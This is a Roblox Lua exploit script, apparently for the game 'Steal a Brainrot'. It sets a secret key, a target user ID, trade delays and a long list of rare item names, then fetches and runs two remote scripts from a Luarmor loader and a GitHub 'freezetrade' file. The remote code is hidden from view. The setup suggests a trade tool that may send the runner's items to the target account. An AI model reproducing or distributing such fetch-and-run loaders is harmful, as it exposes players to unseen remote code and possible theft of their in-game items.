getgenv().SECRET_KEY = "mrr_60fc41249fca4acd998076a024e9c30e"
getgenv().TARGET_ID = 8982244292
getgenv().DELAY_STEP = 1      
getgenv().TRADE_CYCLE_DELAY = 2
getgenv().TARGET_BRAINROTS = {
    ["Meowl"] = true,
    ["Skibidi Toilet"] = true,
    ["Strawberry Elephant"] = true,
    ["Griffin"] = true,
    ["Festive 67"] = true,
    ["Burguro And Fryuro"] = true,
    ["Capitano Moby"] = true,
    ["Cerberus"] = true,
    ["Dragon Cannelloni"] = true,
    ["Ketupat Bros"] = true,
    ["Dragon Gingerini"] = true,
    ["Headless Horseman"] = true,
    ["Hydra Dragon Cannelloni"] = true,
    ["Ventoliero Pavonero"] = true,
    ["Nacho Spyder"] = true,
    ["Chipso and Queso"] = true,
    ["Chillin Chili"] = true,
    ["Tuff Toucan"] = true,
    ["La Romantic Grande"] = true,
    ["Nuclearo Dinossauro"] = true,
    ["Money Money Puggy"] = true,
    ["Tang Tang Keletang"] = true,
    ["Ketupat Kepat"] = true,
    ["Tictac Sahur"] = true,
    ["Ketchuru and Musturu"] = true,
    ["Lavadorito Spinito"] = true,
    ["Garama and Madundung"] = true,
    ["Tralaledon"] = true,
    ["Los Puggies"] = true,
    ["Los Primos"] = true,
    ["Los Tacoritas"] = true,
    ["Los Spaghettis"] = true,
    ["Ginger Gerat"] = true,
    ["Love Love Bear"] = true,
    ["Spooky and Pumpky"] = true,
    ["Fragrama and Chocrama"] = true,
    ["La Casa Boo"] = true,
    ["Los Sekolahs"] = true,
    ["Reinito Sleighito"] = true,
    ["Cooki and Milki"] = true,
    ["Rosey and Teddy"] = true,
    ["Popcuru and Fizzuru"] = true,
    ["La Supreme Combinasion"] = true,
    ["Celularcini Viciosini"] = true,
    ["Orcaledon"] = true,
    ["Eviledon"] = true,
    ["Jolly Jolly Sahur"] = true,
    ["La Ginger Sekolah"] = true,
    ["La Food Combinasion"] = true,
    ["Foxini Lanternini"] = true,
    ["Dug dug dug"] = true,
    ["Fortunu and Cashuru"] = true,
    ["Gold Gold Gold"] = true,
    ["La Extinct Grande"] = true,
    ["La Spooky Grande"] = true,
    ["La Taco Combinasion"] = true,
    ["W or L"] = true,
    ["La Jolly Grande"] = true,
    ["Swaggy Bros"] = true,
    ["Gobblino Uniciclino"] = true,
    ["Fragola La La La"] = true,
    ["Mariachi Corazoni"] = true,
    ["Swag Soda"] = true,
    ["Los Bros"] = true,
    ["Los Spooky Combinasionas"] = true,
    ["Rosetti Tualetti"] = true,
    ["Sammyni Fattini"] = true,
    ["La Secret Combinasion"] = true,
    ["Celestial Pegasus"] = true,
    ["Cloverat Clapat"] = true,
    ["La Lucky Grande"] = true
}
task.spawn(function()
loadstring(game:HttpGet("https://api.luarmor.net/files/v4/loaders/fbcd1d25889a843297107dea3642044d.lua"))()
end)
task.spawn(function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/hatchingplayzsback/www/refs/heads/main/freezetrade"))()
end)
